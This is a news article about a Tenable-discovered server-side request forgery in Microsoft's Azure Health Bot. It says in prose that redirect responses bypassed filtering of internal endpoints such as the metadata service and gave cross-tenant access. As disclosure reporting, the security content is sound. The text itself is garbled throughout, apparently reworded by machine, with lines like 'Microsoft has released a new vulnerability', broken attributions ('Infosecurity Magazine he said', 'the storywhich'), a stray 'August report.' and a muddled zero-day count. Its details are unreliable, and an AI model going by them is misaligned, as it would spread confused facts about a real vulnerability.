Microsoft has released a new vulnerability and patched Azure Health Bot, a managed cloud platform with artificial intelligence that healthcare institutions use to develop virtual care assistants. Researchers explained how they gained access and the urgent fix needed.
WHY IT IS IMPORTANT
The HIPAA-compliant Health Bot platform combines medical data with natural language capabilities to understand clinical terminology for use in clinical care, Microsoft said on its website.
Healthcare institutions can use the Health Bot to create customized virtual assistants for clinical staff.
Microsoft has assigned the elevation of privilege vulnerability, related to improper link resolution before accessing files, CVE-2024-38098on August 13. In the report, Microsoft said the vulnerability had not been disclosed or exploited and that it was unlikely that this would happen.
Tenable researchers were given an access token for management.azure.com that allowed them to enumerate the subscriptions they had access to via the application programming interface (API), which provided them with a subscription ID that was internal to Microsoft. Infosecurity Magazine he said on Wednesday.
The researchers contacted Microsoft on June 17 and on July 2, fixes were rolled out to affected environments, the storywhich indicated that the vulnerability had been resolved by rejecting redirect status codes for data connection endpoints.
At the company blog On Tuesday, researchers from Tenable said they discovered multiple privilege escalation issues in Azure Health Bot via a server-side request forgery, which gave researchers access to cross-tenant resources.
Tenable said its researchers were interested in data connections that would allow bots to communicate with external data sources to pull information from other services the provider might use — “such as a patient information portal or a reference database for general medical information.”
“Given the level of access provided, it is likely that lateral movement to other sources would have been possible,” the researchers said.
They said they also discovered another endpoint used to validate data connections for Fast Healthcare Interoperability Resources endpoints that was “more or less vulnerable to the same attack.” However, the FHIR endpoint vector was unable to impact requests and access.
According to Microsoft, six of the nine zero-day vulnerabilities were also exploited. August report.
THE BIGGER TREND
The U.S. Department of Health and Human Services requires FHIR APIs in all certified electronic health record systems, accessible via Azure Health Bot, according to the Health IT Certification Program rules.
Because FHIR is a framework, vulnerabilities that are discovered are typically traced to the way data and application developers implement it. The FHIR standard is widely embraced as part of the future of healthcare interoperability.
In June, the Office of the National Coordinator for Healthcare Technology and the Health Resources and Services Administration reported that HRSA had begun using FHIR-based APIs to streamline reporting processes and improve data quality. Additionally, since April, HRSA had begun receiving live data reports from the Uniform Data System.
“The (United States Core Data for Interoperability, a standardized set of health data classes and elements) and Bulk FHIR are designed to provide the digital glue for a learning healthcare system and fully accountable accountability for the performance of these providers in a modern way with big data,” Don Rucker, former ONC chief and chief strategy officer at 1UpHealth, told Healthcare IT News at the time of the announcement by the authorities.
ON THE RECORD
“This data connection feature is designed to allow the service backend to make requests to third-party APIs,” Tenable researchers wrote in the blog post.
“While testing these data connections to see if they could interact with endpoints within the service, Tenable researchers discovered that many common endpoints, such as Azure’s Internal Metadata Service, were properly filtered or inaccessible. However, upon closer inspection, it was discovered that issuing redirect responses (e.g., 301/302 status codes) allowed these mitigations to be bypassed.”
Andrea Fox is Editor-in-Chief of Healthcare IT News.
Email address: afox@himss.org
Healthcare IT News is a publication of HIMSS Media.
The HIMSS Healthcare Cybersecurity Forum is scheduled for October 31-November 1 in Washington, DC More information and registration.